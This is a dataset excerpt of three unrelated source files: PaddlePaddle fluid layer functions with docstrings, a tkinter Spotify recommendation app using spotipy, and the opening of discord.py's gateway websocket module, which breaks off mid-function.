bilinear interpolation with the four nearest pixels.
3. Sample several points in each bin to get average values as output.
Args:
input (Variable): The input of deformable roi pooling; a tensor whose value type is float32. The shape of the input is
[N, C, H, W]. Where N is batch size, C is number of input channels,
H is height of the feature, and W is the width of the feature.
rois (Variable): ROIs (Regions of Interest) with type float32 to pool over. It should be
a 2-D LoDTensor of shape (num_rois, 4), and the lod level
is 1. Given as [[x1, y1, x2, y2], ...], (x1, y1) is
the top left coordinates, and (x2, y2) is the bottom
right coordinates, which value type is float32.
trans (Variable): Offset of features on ROIs while pooling which value type is float32. The format is [N, C, H, W], where
N is number of ROIs, C is number of channels, which indicate the offset distance
in the x and y directions, H is pooled height, and W is pooled width.
no_trans (bool): Whether to skip adding the offset to get new values while roi pooling.
If True, no offset will be added in the operation. Default: False.
spatial_scale (float): Ratio of input feature map height (or width) to raw image height (or width), which value type is float32.
Equals the reciprocal of total stride in convolutional layers, Default: 1.0.
group_size (list|tuple): The number of groups into which the input channels are divided, given as a list or tuple of int32. (e.g. the number of input channels
is k1 * k2 * (C + 1), where k1 and k2 are the group width and height and C + 1 is the number of output
channels.) e.g. (4, 6), where 4 is the group height and 6 is the group width. Default: [1, 1].
pooled_height (int): The pooled output height which value type is int32. Default: 1.
pooled_width (int): The pooled output width which value type is int32. Default: 1.
part_size (list|tuple): The height and width of the offset, given as a list or tuple of int32, e.g. (4, 6), where the height is 4 and the width is 6; the values always equal pooled_height \
and pooled_width. Default: if None, default value is [pooled_height, pooled_width].
sample_per_part (int): The number of samples in each bin, with value type int32. A larger value consumes more computation. Default: 1.
trans_std (float): Coefficient of offset which value type is float32. It controls weight of offset. Default: 0.1.
position_sensitive (bool): Whether to choose the deformable psroi pooling mode, with value type bool (True or False). If False, the input dimension equals the output dimension. \
If True, the input dimension should be output dimension * pooled_height * pooled_width. Default: False.
name (str|None): Name of layer. Default: None.
Returns:
Variable: Output of deformable roi pooling. If position_sensitive is False, the input dimension equals the output dimension. If position_sensitive is True, \
the input dimension should be the result of the output dimension divided by pooled height and pooled width.
Examples:
.. code-block:: python
# position_sensitive=True
import paddle.fluid as fluid
input = fluid.data(name="input",
shape=[2, 192, 64, 64],
dtype='float32')
rois = fluid.data(name="rois",
shape=[-1, 4],
dtype='float32',
lod_level=1)
trans = fluid.data(name="trans",
shape=[2, 384, 64, 64],
dtype='float32')
x = fluid.layers.deformable_roi_pooling(input=input,
rois=rois,
trans=trans,
no_trans=False,
spatial_scale=1.0,
group_size=(1, 1),
pooled_height=8,
pooled_width=8,
part_size=(8, 8),
sample_per_part=4,
trans_std=0.1,
position_sensitive=True)
# position_sensitive=False
import paddle.fluid as fluid
input = fluid.data(name="input",
shape=[2, 192, 64, 64],
dtype='float32')
rois = fluid.data(name="rois",
shape=[-1, 4],
dtype='float32',
lod_level=1)
trans = fluid.data(name="trans",
shape=[2, 384, 64, 64],
dtype='float32')
x = fluid.layers.deformable_roi_pooling(input=input,
rois=rois,
trans=trans,
no_trans=False,
spatial_scale=1.0,
group_size=(1, 1),
pooled_height=8,
pooled_width=8,
part_size=(8, 8),
sample_per_part=4,
trans_std=0.1,
position_sensitive=False)
"""
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'deformable_roi_pooling')
check_variable_and_dtype(rois, 'rois', ['float32', 'float64'],
'deformable_roi_pooling')
check_variable_and_dtype(trans, 'trans', ['float32', 'float64'],
'deformable_roi_pooling')
check_type(group_size, 'group_size', (list, tuple),
'deformable_roi_pooling')
if part_size is not None:
check_type(part_size, 'part_size', (list, tuple),
'deformable_roi_pooling')
input_channels = input.shape[1]
if position_sensitive == False:
output_channels = input_channels
else:
output_channels = input_channels // pooled_height // pooled_width  # output_dim attr expects an integer
if part_size is None:
part_height = pooled_height
part_width = pooled_width
part_size = [part_height, part_width]
part_size = utils.convert_to_list(part_size, 2, 'part_size')
group_size = utils.convert_to_list(group_size, 2, 'group_size')
helper = LayerHelper('deformable_psroi_pooling', **locals())
dtype = helper.input_dtype()
output = helper.create_variable_for_type_inference(dtype)
top_count = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type="deformable_psroi_pooling",
inputs={"Input": input,
"ROIs": rois,
"Trans": trans},
outputs={"Output": output,
"TopCount": top_count},
attrs={
"no_trans": no_trans,
"spatial_scale": spatial_scale,
"output_dim": output_channels,
"group_size": group_size,
"pooled_height": pooled_height,
"pooled_width": pooled_width,
"part_size": part_size,
"sample_per_part": sample_per_part,
"trans_std": trans_std
})
return output
def shard_index(input, index_num, nshards, shard_id, ignore_value=-1):
"""
This operator recomputes the `input` indices according to the offset of the
shard. The length of the indices is evenly divided into N shards, and if
the `shard_id` matches the shard with the input index inside, the index is
recomputed on the basis of the shard offset, otherwise it is set to
`ignore_value`. The detail is as follows:
::
shard_size = (index_num + nshards - 1) // nshards
y = x % shard_size if x // shard_size == shard_id else ignore_value
NOTE: If the length of indices cannot be evenly divided by the shard number,
the size of the last shard will be less than the calculated `shard_size`
Examples:
::
Input:
X.shape = [4, 1]
X.data = [[1], [6], [12], [19]]
index_num = 20
nshards = 2
ignore_value = -1
if shard_id == 0, we get:
Out.shape = [4, 1]
Out.data = [[1], [6], [-1], [-1]]
if shard_id == 1, we get:
Out.shape = [4, 1]
Out.data = [[-1], [-1], [2], [9]]
Args:
- **input** (Variable): Input indices, last dimension must be 1.
- **index_num** (scalar): An integer defining the range of the index.
- **nshards** (scalar): The number of shards
- **shard_id** (scalar): The index of the current shard
- **ignore_value** (scalar): An integer value out of sharded index range
Returns:
Variable: The sharded index of input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
batch_size = 32
label = fluid.data(name="label", shape=[batch_size, 1], dtype="int64")
shard_label = fluid.layers.shard_index(input=label,
index_num=20,
nshards=2,
shard_id=0)
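A plain-Python sketch of the recompute rule above; it reproduces the worked
example (index_num=20, nshards=2):

.. code-block:: python

    def shard(x, index_num=20, nshards=2, shard_id=0, ignore_value=-1):
        shard_size = (index_num + nshards - 1) // nshards        # 10
        return x % shard_size if x // shard_size == shard_id else ignore_value

    [shard(v, shard_id=0) for v in [1, 6, 12, 19]]   # [1, 6, -1, -1]
    [shard(v, shard_id=1) for v in [1, 6, 12, 19]]   # [-1, -1, 2, 9]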
"""
op_type = 'shard_index'
helper = LayerHelper(op_type, **locals())
if shard_id < 0 or shard_id >= nshards:
raise ValueError('The shard_id(%d) should be in [0, %d)' %
(shard_id, nshards))
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=op_type,
inputs={'X': [input]},
outputs={'Out': out},
attrs={
'index_num': index_num,
'nshards': nshards,
'shard_id': shard_id,
'ignore_value': ignore_value
},
stop_gradient=True)
return out
@templatedoc()
def hard_swish(x, threshold=6.0, scale=6.0, offset=3.0, name=None):
"""
This operator implements the hard_swish activation function.
Hard_swish is proposed in MobileNetV3, and performs better in computational stability and efficiency compared to swish function.
For more details please refer to: https://arxiv.org/pdf/1905.02244.pdf
The formula is as follows:
.. math::
out = \\frac{x * (min(max(0, x+offset), threshold))}{scale}
In the above equation:
``threshold`` and ``scale`` should be positive, ``offset`` can be positive or negative. It is recommended to use default parameters.
Args:
x (Variable): Input feature, multi-dimensional Tensor. The data type should be float32 or float64.
threshold (float, optional): The threshold in Relu function. Default: 6.0
scale (float, optional): The scale factor. Default: 6.0
offset (float, optional): The offset factor. Default: 3.0
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: The output tensor with the same shape and data type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
DATATYPE='float32'
x_data = np.array([i for i in range(1,5)]).reshape([1,1,4]).astype(DATATYPE)
x = fluid.data(name="x", shape=[None,1,4], dtype=DATATYPE)
y = fluid.layers.hard_swish(x)
place = fluid.CPUPlace()
#place = fluid.CUDAPlace(0)
exe = fluid.Executor(place)
out, = exe.run(feed={'x':x_data}, fetch_list=[y.name])
print(out) # [[0.66666667, 1.66666667,3., 4.]]
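A numpy sketch of the formula above with the default threshold/scale/offset;
it reproduces the printed result:

.. code-block:: python

    import numpy as np

    x_np = np.array([1., 2., 3., 4.], dtype='float32')
    ref = x_np * np.clip(x_np + 3.0, 0.0, 6.0) / 6.0   # [0.6667, 1.6667, 3., 4.]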
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hard_swish')
helper = LayerHelper('hard_swish', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='hard_swish',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold,
'scale': scale,
'offset': offset})
return out
def gather_tree(ids, parents):
"""
To be used after beam search. After beam search, we get selected ids at
each time step and the corresponding parents in the search tree. Both ids
and parents have the layout :attr:`[max_time, batch_size, beam_size]`. Then
:attr:`gather_tree` is used to backtrace from the last time step and
generate the full sequences by collecting selected ids.
Here is an example:
.. code-block:: text
Given:
ids = [[[2 2]
[6 1]]
[[3 9]
[6 1]]
[[0 1]
[9 0]]]
parents = [[[0 0]
[1 1]]
[[1 0]
[1 0]]
[[0 0]
[0 1]]]
Then:
gather_tree(ids, parents)
= [[[2 2]
[1 6]]
[[3 3]
[6 1]]
[[0 1]
[9 0]]]
Args:
ids(Variable): A Tensor with shape :attr:`[length, batch_size, beam_size]`
and data type :attr:`int32` or :attr:`int64`. It contains the selected
ids of all time steps.
parents(Variable): A Tensor with the same shape and data type as :attr:`ids`,
It contains the parents corresponding to selected ids when searching
among beams.
Returns:
Variable: A Tensor with the same shape and data type as :attr:`ids`. \
It contains the full sequences. The sequences are collected from \
:attr:`ids` by backtracing according to :attr:`parents`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
ids = fluid.layers.data(name='ids',
shape=[5, 2, 2],
dtype='int64',
append_batch_size=False)
parents = fluid.layers.data(name='parents',
shape=[5, 2, 2],
dtype='int64',
append_batch_size=False)
final_sequences = fluid.layers.gather_tree(ids, parents)
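A plain-Python sketch of the backtracing described above; it reproduces the
text example (the real op may handle additional details such as finished beams):

.. code-block:: python

    import numpy as np

    def gather_tree_ref(ids, parents):
        T, B, K = ids.shape
        out = np.empty_like(ids)
        for b in range(B):
            for k in range(K):
                out[T - 1, b, k] = ids[T - 1, b, k]
                parent = parents[T - 1, b, k]
                for t in range(T - 2, -1, -1):
                    out[t, b, k] = ids[t, b, parent]
                    parent = parents[t, b, parent]
        return out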
"""
helper = LayerHelper('gather_tree', **locals())
out = helper.create_variable_for_type_inference(dtype=ids.dtype)
helper.append_op(
type="gather_tree",
inputs={"Ids": ids,
"Parents": parents},
outputs={"Out": out})
return out
@templatedoc()
def uniform_random(shape, dtype='float32', min=-1.0, max=1.0, seed=0):
"""
This OP initializes a variable with random values sampled from a
uniform distribution in the range [min, max).
Examples:
::
Input:
shape = [1, 2]
Output:
result=[[0.8505902, 0.8397286]]
Args:
shape (list|tuple|Variable): The shape of the output Tensor, if the shape is a list or tuple,
its elements can be an integer
or a Tensor with the shape [1], and the type of the Tensor must be int32 or int64.
If the shape is a Variable, it is a 1-D Tensor, and the type of the Tensor must be int32 or int64.
dtype(np.dtype|core.VarDesc.VarType|str, optional): The type of the output Tensor. Supported data types: float32, float64.
Default: float32.
min (float, optional): The lower bound on the range of random values to generate, the min is included in the range. Default -1.0.
max (float, optional): The upper bound on the range of random values to generate, the max is excluded in the range. Default 1.0.
seed (int, optional): Random seed used for generating samples. 0 means use a
seed generated by the system. Note that if seed is not 0, this
operator will always generate the same random numbers every time.
Default 0.
Returns:
Variable: A Tensor of the specified shape filled with uniform_random values.
Raises:
TypeError: The shape type should be list or tuple or variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
# attr shape is a list which doesn't contain tensor Variable.
result_1 = fluid.layers.uniform_random(shape=[3, 4])
# example 2:
# attr shape is a list which contains tensor Variable.
dim_1 = fluid.layers.fill_constant([1],"int64",3)
dim_2 = fluid.layers.fill_constant([1],"int32",5)
result_2 = fluid.layers.uniform_random(shape=[dim_1, dim_2])
# example 3:
# attr shape is a Variable, the data type must be int64 or int32.
var_shape = fluid.data(name='var_shape', shape=[2], dtype="int64")
result_3 = fluid.layers.uniform_random(var_shape)
var_shape_int32 = fluid.data(name='var_shape_int32', shape=[2], dtype="int32")
result_4 = fluid.layers.uniform_random(var_shape_int32)
"""
check_type(shape, 'shape', (list, tuple, Variable), 'uniform_random')
if not isinstance(dtype, core.VarDesc.VarType):
dtype = convert_np_dtype_to_dtype_(dtype)
check_dtype(dtype, 'dtype', ['float32', 'float64'], 'uniform_random')
def get_new_shape_tensor(list_shape):
new_shape_tensor = []
for dim in list_shape:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_shape_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int64')
fill_constant([1], 'int64', dim, force_cpu=True, out=temp_out)
new_shape_tensor.append(temp_out)
return new_shape_tensor
def get_attr_shape(list_shape):
unk_dim_idx = -1
attrs_shape = []
for dim_idx, dim_size in enumerate(list_shape):
if isinstance(dim_size, Variable):
attrs_shape.append(-1)
else:
attrs_shape.append(dim_size)
                assert dim_size > 0, (
                    "Each non-Tensor dimension size given in shape must be "
                    "a positive integer.")
return attrs_shape
helper = LayerHelper("uniform_random", **locals())
inputs = dict()
attrs = {'seed': seed, 'min': min, 'max': max}
if in_dygraph_mode():
attrs['shape'] = shape
else:
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs["ShapeTensor"] = shape
elif isinstance(shape, (list, tuple)):
assert len(shape) > 0, (
"The size of argument(shape) can't be zero.")
attrs["shape"] = get_attr_shape(shape)
if utils._contain_var(shape):
inputs['ShapeTensorList'] = get_new_shape_tensor(shape)
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="uniform_random", inputs=inputs, attrs=attrs,
outputs={"Out": out})
return helper.append_activation(out)
|
the-stack_0_3686 | from dotenv import load_dotenv
load_dotenv()
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import tkinter as tk
import webbrowser
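# Optional sketch (added for illustration, not used below): since load_dotenv() is
# called above, the Spotify credentials could be read from environment variables
# (e.g. SPOTIPY_CLIENT_ID / SPOTIPY_CLIENT_SECRET, the names spotipy conventionally
# uses) instead of being hard-coded further down.
import os
def get_credentials_from_env():
    return os.getenv("SPOTIPY_CLIENT_ID"), os.getenv("SPOTIPY_CLIENT_SECRET")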
def open_spotify(url):
webbrowser.open(url, new = 2)
def create_label(text):
return tk.Label(master = frm_recommendations, text = text)
def create_button(text, url):
return tk.Button(master = frm_recommendations, text = text, command = lambda:open_spotify(url))
def clear(*args):
    # destroy each widget passed in (calling destroy() on the args tuple itself would fail)
    for widget in args:
        widget.destroy()
def display_recommendations(response):
lbl_track_name = tk.Label(master = frm_recommendations, text = 'Track Name')
lbl_artist_name = tk.Label(master = frm_recommendations, text = 'Artist Name')
lbl_play_it = tk.Label(master = frm_recommendations, text = 'Play It')
lbl_track_name.grid(row = 0,column = 0)
lbl_artist_name.grid(row = 0,column = 1)
lbl_play_it.grid(row = 0,column = 2)
for idx, track in enumerate(response['tracks']):
lbl_track_name_recommended = create_label(track['name'])
lbl_track_name_recommended.grid(row = idx + 1, column = 0)
lbl_artist_name_recommended = create_label(track['artists'][0]['name'])
lbl_artist_name_recommended.grid(row = idx + 1, column = 1)
        btn_play_it_recommended = create_button('Play It', track['external_urls']['spotify'])
        btn_play_it_recommended.grid(row = idx + 1, column = 2, padx = 10)
def get_recommendations():
search = ent_search.get()
sp = spotipy.Spotify(client_credentials_manager = SpotifyClientCredentials ("#### enter your spotify client id ####","#### Get your secret client id here https://developer.spotify.com/dashboard/applications ####"))
result = sp.search(q = search, limit =1)
id_list = [result['tracks']['items'][0]['id']]
recommendations = sp.recommendations(seed_tracks = id_list, limit = 10)
display_recommendations(recommendations)
window = tk.Tk()
frm_search_field = tk.Frame(master = window, width = 100)
frm_recommendations = tk.Frame(master = window)
frm_search_field.pack()
frm_recommendations.pack()
ent_search = tk.Entry(master= frm_search_field, width =25)
btn_get_recommendations = tk.Button(master = frm_search_field, text = 'Get recommendations', command= get_recommendations)
ent_search.grid(row = 0,column = 0,pady = 10,padx = 10)
btn_get_recommendations.grid(row = 0,column = 1,pady = 10,padx = 10)
window.mainloop()
|
the-stack_0_3687 | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
from collections import namedtuple, deque
import concurrent.futures
import logging
import struct
import sys
import time
import threading
import traceback
import zlib
import aiohttp
from . import utils
from .activity import BaseActivity
from .enums import SpeakingState
from .errors import ConnectionClosed, InvalidArgument
_log = logging.getLogger(__name__)
__all__ = (
"DiscordWebSocket",
"KeepAliveHandler",
"VoiceKeepAliveHandler",
"DiscordVoiceWebSocket",
"ReconnectWebSocket",
)
class ReconnectWebSocket(Exception):
"""Signals to safely reconnect the websocket."""
def __init__(self, shard_id, *, resume=True):
self.shard_id = shard_id
self.resume = resume
self.op = "RESUME" if resume else "IDENTIFY"
class WebSocketClosure(Exception):
"""An exception to make up for the fact that aiohttp doesn't signal closure."""
pass
EventListener = namedtuple("EventListener", "predicate event result future")
class GatewayRatelimiter:
def __init__(self, count=110, per=60.0):
# The default is 110 to give room for at least 10 heartbeats per minute
self.max = count
self.remaining = count
self.window = 0.0
self.per = per
self.lock = asyncio.Lock()
self.shard_id = None
def is_ratelimited(self):
current = time.time()
if current > self.window + self.per:
return False
return self.remaining == 0
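    # Note (added): get_delay() below implements a fixed-window rate limit -- once
    # `per` seconds have elapsed the budget resets to `max`; each call consumes one
    # send, and when the budget reaches zero it returns how long to sleep until the
    # window rolls over.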
def get_delay(self):
current = time.time()
if current > self.window + self.per:
self.remaining = self.max
if self.remaining == self.max:
self.window = current
if self.remaining == 0:
return self.per - (current - self.window)
self.remaining -= 1
if self.remaining == 0:
self.window = current
return 0.0
async def block(self):
async with self.lock:
delta = self.get_delay()
if delta:
_log.warning(
"WebSocket in shard ID %s is ratelimited, waiting %.2f seconds",
self.shard_id,
delta,
)
await asyncio.sleep(delta)
class KeepAliveHandler(threading.Thread):
def __init__(self, *args, **kwargs):
ws = kwargs.pop("ws", None)
interval = kwargs.pop("interval", None)
shard_id = kwargs.pop("shard_id", None)
threading.Thread.__init__(self, *args, **kwargs)
self.ws = ws
self._main_thread_id = ws.thread_id
self.interval = interval
self.daemon = True
self.shard_id = shard_id
self.msg = "Keeping shard ID %s websocket alive with sequence %s."
self.block_msg = "Shard ID %s heartbeat blocked for more than %s seconds."
self.behind_msg = "Can't keep up, shard ID %s websocket is %.1fs behind."
self._stop_ev = threading.Event()
self._last_ack = time.perf_counter()
self._last_send = time.perf_counter()
self._last_recv = time.perf_counter()
self.latency = float("inf")
self.heartbeat_timeout = ws._max_heartbeat_timeout
def run(self):
while not self._stop_ev.wait(self.interval):
if self._last_recv + self.heartbeat_timeout < time.perf_counter():
_log.warning(
"Shard ID %s has stopped responding to the gateway. Closing and restarting.",
self.shard_id,
)
coro = self.ws.close(4000)
f = asyncio.run_coroutine_threadsafe(coro, loop=self.ws.loop)
try:
f.result()
except Exception:
_log.exception(
"An error occurred while stopping the gateway. Ignoring."
)
finally:
self.stop()
return
data = self.get_payload()
_log.debug(self.msg, self.shard_id, data["d"])
coro = self.ws.send_heartbeat(data)
f = asyncio.run_coroutine_threadsafe(coro, loop=self.ws.loop)
try:
# block until sending is complete
total = 0
while True:
try:
f.result(10)
break
except concurrent.futures.TimeoutError:
total += 10
try:
frame = sys._current_frames()[self._main_thread_id]
except KeyError:
msg = self.block_msg
else:
stack = "".join(traceback.format_stack(frame))
msg = f"{self.block_msg}\nLoop thread traceback (most recent call last):\n{stack}"
_log.warning(msg, self.shard_id, total)
except Exception:
self.stop()
else:
self._last_send = time.perf_counter()
def get_payload(self):
return {"op": self.ws.HEARTBEAT, "d": self.ws.sequence}
def stop(self):
self._stop_ev.set()
def tick(self):
self._last_recv = time.perf_counter()
def ack(self):
ack_time = time.perf_counter()
self._last_ack = ack_time
self.latency = ack_time - self._last_send
if self.latency > 10:
_log.warning(self.behind_msg, self.shard_id, self.latency)
class VoiceKeepAliveHandler(KeepAliveHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.recent_ack_latencies = deque(maxlen=20)
self.msg = "Keeping shard ID %s voice websocket alive with timestamp %s."
self.block_msg = "Shard ID %s voice heartbeat blocked for more than %s seconds"
self.behind_msg = "High socket latency, shard ID %s heartbeat is %.1fs behind"
def get_payload(self):
return {"op": self.ws.HEARTBEAT, "d": int(time.time() * 1000)}
def ack(self):
ack_time = time.perf_counter()
self._last_ack = ack_time
self._last_recv = ack_time
self.latency = ack_time - self._last_send
self.recent_ack_latencies.append(self.latency)
class DiscordClientWebSocketResponse(aiohttp.ClientWebSocketResponse):
async def close(self, *, code: int = 4000, message: bytes = b"") -> bool:
return await super().close(code=code, message=message)
class DiscordWebSocket:
"""Implements a WebSocket for Discord's gateway v6.
Attributes
-----------
DISPATCH
        Receive only. Denotes an event received from Discord, such as READY.
HEARTBEAT
When received tells Discord to keep the connection alive.
When sent asks if your connection is currently alive.
IDENTIFY
Send only. Starts a new session.
PRESENCE
Send only. Updates your presence.
VOICE_STATE
Send only. Starts a new connection to a voice guild.
VOICE_PING
Send only. Checks ping time to a voice guild, do not use.
RESUME
Send only. Resumes an existing connection.
RECONNECT
Receive only. Tells the client to reconnect to a new gateway.
REQUEST_MEMBERS
Send only. Asks for the full member list of a guild.
INVALIDATE_SESSION
Receive only. Tells the client to optionally invalidate the session
and IDENTIFY again.
HELLO
Receive only. Tells the client the heartbeat interval.
HEARTBEAT_ACK
Receive only. Confirms receiving of a heartbeat. Not having it implies
a connection issue.
GUILD_SYNC
Send only. Requests a guild sync.
gateway
The gateway we are currently connected to.
token
The authentication token for discord.
"""
DISPATCH = 0
HEARTBEAT = 1
IDENTIFY = 2
PRESENCE = 3
VOICE_STATE = 4
VOICE_PING = 5
RESUME = 6
RECONNECT = 7
REQUEST_MEMBERS = 8
INVALIDATE_SESSION = 9
HELLO = 10
HEARTBEAT_ACK = 11
GUILD_SYNC = 12
def __init__(self, socket, *, loop):
self.socket = socket
self.loop = loop
# an empty dispatcher to prevent crashes
self._dispatch = lambda *args: None
# generic event listeners
self._dispatch_listeners = []
# the keep alive
self._keep_alive = None
self.thread_id = threading.get_ident()
# ws related stuff
self.session_id = None
self.sequence = None
self._zlib = zlib.decompressobj()
self._buffer = bytearray()
self._close_code = None
self._rate_limiter = GatewayRatelimiter()
@property
def open(self):
return not self.socket.closed
def is_ratelimited(self):
return self._rate_limiter.is_ratelimited()
def debug_log_receive(self, data, /):
self._dispatch("socket_raw_receive", data)
def log_receive(self, _, /):
pass
@classmethod
async def from_client(
cls,
client,
*,
initial=False,
gateway=None,
shard_id=None,
session=None,
sequence=None,
resume=False,
):
"""Creates a main websocket for Discord from a :class:`Client`.
This is for internal use only.
"""
gateway = gateway or await client.http.get_gateway()
socket = await client.http.ws_connect(gateway)
ws = cls(socket, loop=client.loop)
# dynamically add attributes needed
ws.token = client.http.token
ws._connection = client._connection
ws._discord_parsers = client._connection.parsers
ws._dispatch = client.dispatch
ws.gateway = gateway
ws.call_hooks = client._connection.call_hooks
ws._initial_identify = initial
ws.shard_id = shard_id
ws._rate_limiter.shard_id = shard_id
ws.shard_count = client._connection.shard_count
ws.session_id = session
ws.sequence = sequence
ws._max_heartbeat_timeout = client._connection.heartbeat_timeout
if client._enable_debug_events:
ws.send = ws.debug_send
ws.log_receive = ws.debug_log_receive
client._connection._update_references(ws)
_log.debug("Created websocket connected to %s", gateway)
# poll event for OP Hello
await ws.poll_event()
if not resume:
await ws.identify()
return ws
await ws.resume()
return ws
def wait_for(self, event, predicate, result=None):
"""Waits for a DISPATCH'd event that meets the predicate.
Parameters
-----------
event: :class:`str`
The event name in all upper case to wait for.
predicate
A function that takes a data parameter to check for event
properties. The data parameter is the 'd' key in the JSON message.
result
A function that takes the same data parameter and executes to send
the result to the future. If ``None``, returns the data.
Returns
--------
asyncio.Future
A future to wait for.
"""
future = self.loop.create_future()
entry = EventListener(
event=event, predicate=predicate, result=result, future=future
)
self._dispatch_listeners.append(entry)
return future
async def identify(self):
"""Sends the IDENTIFY packet."""
payload = {
"op": self.IDENTIFY,
"d": {
"token": self.token,
"properties": {
"$os": sys.platform,
"$browser": "discord.py",
"$device": "discord.py",
"$referrer": "",
"$referring_domain": "",
},
"compress": True,
"large_threshold": 250,
"v": 3,
},
}
if self.shard_id is not None and self.shard_count is not None:
payload["d"]["shard"] = [self.shard_id, self.shard_count]
state = self._connection
if state._activity is not None or state._status is not None:
payload["d"]["presence"] = {
"status": state._status,
"game": state._activity,
"since": 0,
"afk": False,
}
if state._intents is not None:
payload["d"]["intents"] = state._intents.value
await self.call_hooks(
"before_identify", self.shard_id, initial=self._initial_identify
)
await self.send_as_json(payload)
_log.info("Shard ID %s has sent the IDENTIFY payload.", self.shard_id)
async def resume(self):
"""Sends the RESUME packet."""
payload = {
"op": self.RESUME,
"d": {
"seq": self.sequence,
"session_id": self.session_id,
"token": self.token,
},
}
await self.send_as_json(payload)
_log.info("Shard ID %s has sent the RESUME payload.", self.shard_id)
async def received_message(self, msg, /):
if type(msg) is bytes:
self._buffer.extend(msg)
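            # Note (added): with zlib-stream transport compression a payload is only
            # complete once it ends with the zlib flush suffix b"\x00\x00\xff\xff",
            # so partial chunks are buffered here until that suffix arrives.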
if len(msg) < 4 or msg[-4:] != b"\x00\x00\xff\xff":
return
msg = self._zlib.decompress(self._buffer)
msg = msg.decode("utf-8")
self._buffer = bytearray()
self.log_receive(msg)
msg = utils._from_json(msg)
self._dispatch("socket_response")
_log.debug("For Shard ID %s: WebSocket Event: %s", self.shard_id, msg)
event = msg.get("t")
if event:
self._dispatch("socket_event_type", event)
op = msg.get("op")
data = msg.get("d")
seq = msg.get("s")
if seq is not None:
self.sequence = seq
if self._keep_alive:
self._keep_alive.tick()
if op != self.DISPATCH:
if op == self.RECONNECT:
# "reconnect" can only be handled by the Client
# so we terminate our connection and raise an
# internal exception signalling to reconnect.
_log.debug("Received RECONNECT opcode.")
await self.close()
raise ReconnectWebSocket(self.shard_id)
if op == self.HEARTBEAT_ACK:
if self._keep_alive:
self._keep_alive.ack()
return
if op == self.HEARTBEAT:
if self._keep_alive:
beat = self._keep_alive.get_payload()
await self.send_as_json(beat)
return
if op == self.HELLO:
interval = data["heartbeat_interval"] / 1000.0
self._keep_alive = KeepAliveHandler(
ws=self, interval=interval, shard_id=self.shard_id
)
# send a heartbeat immediately
await self.send_as_json(self._keep_alive.get_payload())
self._keep_alive.start()
return
if op == self.INVALIDATE_SESSION:
if data is True:
await self.close()
raise ReconnectWebSocket(self.shard_id)
self.sequence = None
self.session_id = None
_log.info("Shard ID %s session has been invalidated.", self.shard_id)
await self.close(code=1000)
raise ReconnectWebSocket(self.shard_id, resume=False)
_log.warning("Unknown OP code %s.", op)
return
if event == "READY":
self._trace = trace = data.get("_trace", [])
self.sequence = msg["s"]
self.session_id = data["session_id"]
# pass back shard ID to ready handler
data["__shard_id__"] = self.shard_id
_log.info(
"Shard ID %s has connected to Gateway: %s (Session ID: %s).",
self.shard_id,
", ".join(trace),
self.session_id,
)
elif event == "RESUMED":
self._trace = trace = data.get("_trace", [])
# pass back the shard ID to the resumed handler
data["__shard_id__"] = self.shard_id
_log.info(
"Shard ID %s has successfully RESUMED session %s under trace %s.",
self.shard_id,
self.session_id,
", ".join(trace),
)
try:
func = self._discord_parsers[event]
except KeyError:
_log.debug("Unknown event %s.", event)
else:
func(data)
# remove the dispatched listeners
removed = []
for index, entry in enumerate(self._dispatch_listeners):
if entry.event != event:
continue
future = entry.future
if future.cancelled():
removed.append(index)
continue
try:
valid = entry.predicate(data)
except Exception as exc:
future.set_exception(exc)
removed.append(index)
else:
if valid:
ret = data if entry.result is None else entry.result(data)
future.set_result(ret)
removed.append(index)
for index in reversed(removed):
del self._dispatch_listeners[index]
@property
def latency(self):
""":class:`float`: Measures latency between a HEARTBEAT and a HEARTBEAT_ACK in seconds."""
heartbeat = self._keep_alive
return float("inf") if heartbeat is None else heartbeat.latency
def _can_handle_close(self):
code = self._close_code or self.socket.close_code
return code not in (1000, 4004, 4010, 4011, 4012, 4013, 4014)
async def poll_event(self):
"""Polls for a DISPATCH event and handles the general gateway loop.
Raises
------
ConnectionClosed
The websocket connection was terminated for unhandled reasons.
"""
try:
msg = await self.socket.receive(timeout=self._max_heartbeat_timeout)
if msg.type is aiohttp.WSMsgType.TEXT:
await self.received_message(msg.data)
elif msg.type is aiohttp.WSMsgType.BINARY:
await self.received_message(msg.data)
elif msg.type is aiohttp.WSMsgType.ERROR:
_log.debug("Received %s", msg)
raise msg.data
elif msg.type in (
aiohttp.WSMsgType.CLOSED,
aiohttp.WSMsgType.CLOSING,
